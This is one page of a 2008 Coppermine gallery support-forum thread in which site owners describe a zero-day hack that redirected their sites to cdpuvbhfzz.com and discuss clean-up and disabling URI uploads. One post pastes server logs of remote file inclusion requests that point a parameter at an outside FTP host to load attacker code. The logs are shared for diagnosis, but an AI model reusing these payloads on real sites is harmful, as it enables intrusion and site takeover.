Advanced search  

News:

cpg1.5.46 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter recently discovered vulnerabilities. It is important that all users who run version cpg1.5.44 or older update to this latest version as soon as possible.
[more]

Pages: 1 2 3 4 [5] 6 7 8 9 ... 15   Go Down

Author Topic: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?  (Read 251506 times)

0 Members and 1 Guest are viewing this topic.

marian

  • Coppermine frequent poster
  • ***
  • Offline Offline
  • Posts: 160
    • BYM Photo Gallery
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #80 on: April 10, 2008, 07:05:24 pm »

We put the back up in this morning; ran grep cdpuvbhfzz * -R > hacked.txt and all was clear, disabled URI. Now we have been hacked again.
No, we haven't yet upgraded as we were waiting for your new version.
Logged

Llama8668

  • Coppermine newbie
  • Offline Offline
  • Posts: 18
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #81 on: April 10, 2008, 07:13:48 pm »

So does disabling URI and URL for guests (and if that is extended to all other groups as well?) not fix it (I've also put the galleries back up but will block access again if they're still vulnerable)?

Logged

marian

  • Coppermine frequent poster
  • ***
  • Offline Offline
  • Posts: 160
    • BYM Photo Gallery
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #82 on: April 10, 2008, 07:18:12 pm »

So does disabling URI and URL for guests (and if that is extended to all other groups as well?) not fix it (I've also put the galleries back up but will block access again if they're still vulnerable)?
Seems not.
Logged

Llama8668

  • Coppermine newbie
  • Offline Offline
  • Posts: 18
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #83 on: April 10, 2008, 07:25:57 pm »

Did you remove all instances of the uploaded file (it seems the hack might use the URI functionality of coppermine to upload a 142739_298w3 .zip/.jpg file to the default upload folder, this is then run to trigger the mass editing of files).

Is there any other quick fix (such as temporarily removing URI related files or code) which could be employed as a stop gap?
Logged

Nibbler

  • Guest
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #84 on: April 10, 2008, 07:26:40 pm »

You should disable uploading completely for untrusted users (anonymous + unverified registrations) to be safe until the next version is released.
Logged

marian

  • Coppermine frequent poster
  • ***
  • Offline Offline
  • Posts: 160
    • BYM Photo Gallery
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #85 on: April 10, 2008, 07:32:47 pm »


We haven't allowed posting by anyone other than admin for well over a year and have never had registered users.
Logged

Craig Walsh

  • Coppermine regular visitor
  • **
  • Country: us
  • Offline Offline
  • Gender: Male
  • Posts: 51
    • Lucies Farm Ltd.
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #86 on: April 10, 2008, 07:37:15 pm »

Quote
You should disable uploading completely for untrusted users (anonymous + unverified registrations) to be safe until the next version is released.

Yes, sir.  I've done that.  Did it first thing this morning, UK time.  We've not allowed posting by anyone (other than me, as admin) for several years, but we did have the URI Upload boxes (in Groups) set to other than 0.  Now 0's everywhere.

And I understand that you're all working very hard --- and I appreciate that, thank you --- to create the next version of CPG, which will prevent this problem happening again.  

On our own CPG site, although we have completely re-uploaded the latest version --- and we were running the latest version at the time of the attack last night --- we still seem to have this problem.  

I guess what I don't understand (and please don't growl at me for being thick --- guilty as charged!) is whether the next version, when released, will actually fix the current problem on my www.bark.ch website, or will only prevent it from happening again.

If it won't fix it, should I have my server people roll-back the site to yesterday's backup now?   And if we restore from yesterday's back-up, and are certain that uploading from other users is completely, totally shut down, is the problem unlikely to reoccur with the current version of CPG?

I guess I'm just trying to find out if I should wait for the new version --- because it will also fix this problem --- or whether we should restore, be sure uploads are disabled, and then wait for the new release?

Sorry for the questions.  I know you're all busy, and the last thing you want is my sticking my nose in . . . .
Logged
Craig Walsh
CPG Photo Gallery - www.bark.ch
Member of the Association of Photographers (AOP)

marian

  • Coppermine frequent poster
  • ***
  • Offline Offline
  • Posts: 160
    • BYM Photo Gallery
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #87 on: April 10, 2008, 07:50:50 pm »

It looks to me as though this is escalating.

From our server logs:
root@server [/home3/public_html_hack]# cat /etc/httpd/domlogs/bymnews.com | grep upload
208.16.236.69 - - [10/Apr/2008:13:42:23 +0200] "GET /news/newsDetails.php?id=5686/home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok??
HTTP/1.1" 200 9290 "-" "libwww-perl/5.805"
208.16.236.69 - - [10/Apr/2008:13:42:24 +0200] "GET /home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1"
404 - "-" "libwww-perl/5.805"
208.16.236.69 - - [10/Apr/2008:13:42:24 +0200] "GET /news/home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok??
HTTP/1.1" 404 - "-" "libwww-perl/5.805"
217.67.26.84 - - [10/Apr/2008:14:49:37 +0200] "GET /news/newsDetails.php?id=5686/home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok??
HTTP/1.1" 200 9584 "-" "libwww-perl/5.805"
217.67.26.84 - - [10/Apr/2008:14:49:38 +0200] "GET /home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1"
404 - "-" "libwww-perl/5.805"
217.67.26.84 - - [10/Apr/2008:14:49:38 +0200] "GET /news/home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok??
HTTP/1.1" 404 - "-" "libwww-perl/5.805"
85.114.135.126 - - [10/Apr/2008:14:50:51 +0200] "GET /news/newsDetails.php?id=5686/home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok??
HTTP/1.1" 200 9584 "-" "libwww-perl/5.805"
85.114.135.126 - - [10/Apr/2008:14:50:51 +0200] "GET /home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1"
404 - "-" "libwww-perl/5.805"
85.114.135.126 - - [10/Apr/2008:14:50:52 +0200] "GET /news/home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok??
HTTP/1.1" 404 - "-" "libwww-perl/5.805"
209.85.105.25 - - [10/Apr/2008:15:26:44 +0200] "GET /news/newsDetails.php?id=5686/home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok??
HTTP/1.1" 200 9584 "-" "libwww-perl/5.79"
209.85.105.25 - - [10/Apr/2008:15:26:45 +0200] "GET /home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok?? HTTP/1.1"
404 - "-" "libwww-perl/5.79"
209.85.105.25 - - [10/Apr/2008:15:26:46 +0200] "GET /news/home.php?act=ftp://84.32.137.157/incoming/upload/trem/oldbisok??
HTTP/1.1" 404 - "-" "libwww-perl/5.79"
195.5.117.252 - - [10/Apr/2008:18:46:01 +0200] "POST /photos/upload.php HTTP/1.1" 200 6920 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
195.5.117.252 - - [10/Apr/2008:18:47:13 +0200] "POST /photos/upload.php HTTP/1.1" 200 43854 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
195.5.117.252 - - [10/Apr/2008:18:47:22 +0200] "POST /photos/upload.php HTTP/1.1" 200 6782 "-" "User-Agent: Opera/9.27 (Windows NT 5.2; U; ru)"
Logged

Nibbler

  • Guest
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #88 on: April 10, 2008, 07:59:03 pm »

You are asking questions I can't give answers for. How you run your server is up to you. The new version will close *a* security hole I found in upload.php when I checked it after seeing it in the logs people posted here. It won't repair anything, just closes a hole. Since this vulnerability was not responsibly disclosed to us (ie. this is a zero day exploit) I can't know that that is how your site was hacked. I can't know what scripts were uploaded to your server. I don't know any more than you do.
Logged

marian

  • Coppermine frequent poster
  • ***
  • Offline Offline
  • Posts: 160
    • BYM Photo Gallery
Logged

Nibbler

  • Guest
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #90 on: April 10, 2008, 08:13:24 pm »

Of course it is. Coppermine does not have the files that you show being requested. I already asked people to stop posting random bits of information and I really don't want to have to lock the thread.
Logged

Richw2k2

  • Coppermine newbie
  • Offline Offline
  • Posts: 1
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #91 on: April 10, 2008, 08:17:25 pm »

The same has happened to me. I have coppermine in a gallery folder (which i think is a virtual directory?) http://gallery...
Only coppermine exists in this folder and all the php files in this folder have been modified.

I had a similar file but it was a jpg called

142739_298w3.jpg
Logged

marian

  • Coppermine frequent poster
  • ***
  • Offline Offline
  • Posts: 160
    • BYM Photo Gallery
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #92 on: April 10, 2008, 08:26:36 pm »

Of course it is. Coppermine does not have the files that you show being requested. I already asked people to stop posting random bits of information and I really don't want to have to lock the thread.
I apologise but as CPGNuke mentioned it ging for Coppermine I thought maybe another vulnerability might be under target.
Logged

Llama8668

  • Coppermine newbie
  • Offline Offline
  • Posts: 18
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #93 on: April 10, 2008, 08:27:57 pm »

If cdpuvbhfzz is a successful exploit of all galleries then is still a little surprising that it's only effected a few so far (there are big sites which run coppermine which you'd think would be targeted en mass if damage were desired).

So far the cleaned sites are okay (all URI and URL slots have been set to 0 and all the checkboxes for guests are set to no). It's not too much of a problem now that things are back online (and that it's being looked into by the coppermine staff). If the automated removal script a few pages back can be run by all then that will remove the frustration.
Logged

Llama8668

  • Coppermine newbie
  • Offline Offline
  • Posts: 18
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #94 on: April 10, 2008, 09:13:10 pm »

One of my sites has been hacked again (that's with URI and URL set to 0 for all groups) :-\. There's no obvious sign of the offending file within the default upload folder (though the customer header edit points to 142739_298w3.jpg). Perhaps I'm not cleaning the right files from the gallery directory?
Logged

marian

  • Coppermine frequent poster
  • ***
  • Offline Offline
  • Posts: 160
    • BYM Photo Gallery
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #95 on: April 10, 2008, 09:19:28 pm »

One of my sites has been hacked again (that's with URI and URL set to 0 for all groups) :-\. There's no obvious sign of the offending file within the default upload folder (though the customer header edit points to 142739_298w3.jpg). Perhaps I'm not cleaning the right files from the gallery directory?
I hope this wont get this thread locked, but I would like to know what versions of php and apache those who have been hacked are running?
Logged

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47844
  • aka "GauGau"
    • gaugau.de
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #96 on: April 10, 2008, 10:38:22 pm »

This thread will get locked if you don't stop posting irrelevant questions and bits that are meaningless ::).

Do I find it funny that especially people who have a notorious record of misbehaviour on this board turn up on this thread after a long period of silence? No.

OK, everybody please stop it, really! Stop replying to this thread, asking the same questions over and over. We can't tell you how to clean your site once it has been hacked - that's beyond the scope of this site. We can only tell you what you can do to prevent getting hacked: do as Nibbler suggested repeatedly. Don't ask stupid questions like "how can I disable URI uploads"  this is being explained in the docs and has been explained in this thread as well.
I understand that those of you who got hacked are upset, but it certainly won't help to clutter this thread even further.

From now on I'll delete every invalid new posting (like "help, I've been hacked as well" or similar crap) from this thread immediately and I will ban that user from posting for a week. I mean it! Only totally valid replies to this thread are allowed - if you're not sure if your posting is going to be valid, don't post it.

Those who haven't been hacked should still do as Nibbler suggested and lock down their gallery: disallow URI uploads, disallow uploads from untrusted sources. Make a backup of your files and your database now.

Joachim
Logged

shiftsrl

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 74
    • Apple Reseller
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #97 on: April 10, 2008, 11:19:03 pm »

ok hoping not to be banned I would give you some informations.

I've closed the URI upload and the hack has happened again but in half, I think.

I've found in Path to custom header include the usual path at the .jpg o .zip file /albums/userpics/1001/xxxxx the only difference is that the file was not here and neither the directory 1001.

My configuration option was always changed this way

Number of albums to display is set to 1 (mine was 8)
Number of columns for the album list is set to 1 (mine was 2)
Number of columns on thumbnail page is set to 1 (mine was 4)
Number of rows on thumbnail page is set to 1 (mine was 4)

I've noticed that every time these setting are changed in wxactly that way, this means that my gallery was "hacked" and that I'll find the string in Path to custom header include

I hope this will help you guys...
Logged
Shift Srl
 *Link Removed*

Joachim Müller

  • Dev Team member
  • Coppermine addict
  • ****
  • Offline Offline
  • Gender: Male
  • Posts: 47844
  • aka "GauGau"
    • gaugau.de
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #98 on: April 10, 2008, 11:23:25 pm »

You probably haven't sanitized the hacked gallery. Once you have been hacked, it's not enough to just close the vulnerability, as the attacker probably has left a backdoor. You haven't teven told us if you have successfully removed the payload of the trojan. You have to make sure that your site was clean before being able to post a report about a re-infection.
Logged

shiftsrl

  • Coppermine regular visitor
  • **
  • Offline Offline
  • Posts: 74
    • Apple Reseller
Re: Someone has Redirected my Site to cdpuvbhfzz.com-What do I do?
« Reply #99 on: April 11, 2008, 09:13:24 am »

I've removed the 142739_298w3.zip or 142739_298w3.jpg file the first time I've noticed the infection. After that I've not found it anymore. I'm the only one allowed to upload on my gallery and I've disabled the URI upload for all groups. Now that you've told me, I've checked in the userpics forlder (that I don't use to upload pics) and found two files 1x1 pixel called gd1.jpg and gd2.jpg so I've removed them. All the other files are regular image files and the index.html and index.php are ok.

Problem is. How can I sanitize completely the gallery to avoid these annoyances? It seems that now the attack consist only in changing the parameters I've explained in my last message. There's a file I could lock to avoid these changes?
Logged
Shift Srl
 *Link Removed*
Pages: 1 2 3 4 [5] 6 7 8 9 ... 15   Go Up
 

Page created in 0.023 seconds with 20 queries.